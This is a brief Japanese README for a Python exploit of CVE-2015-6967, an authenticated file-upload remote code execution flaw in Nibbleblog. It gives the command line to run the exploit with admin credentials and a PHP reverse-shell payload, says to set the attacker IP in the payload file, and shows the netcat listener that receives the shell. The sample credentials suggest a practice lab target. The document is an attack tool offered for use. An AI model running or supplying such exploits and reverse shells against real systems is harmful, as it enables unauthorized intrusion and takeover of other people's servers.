
Nibbleblogを標的としたCVE-2015-6967用のPythonエクスプロイト。リバースシェルペイロードを使用。ファイルアップロード脆弱性を介して認証済みリモートコード実行を実行。
python exploit.py --url http://xx.xx.xx.xx --username admin --password nibbles --payload phprevshell.php
phprevshell.php の 7 行目の $ip を変更してください
nc -lvnp 1234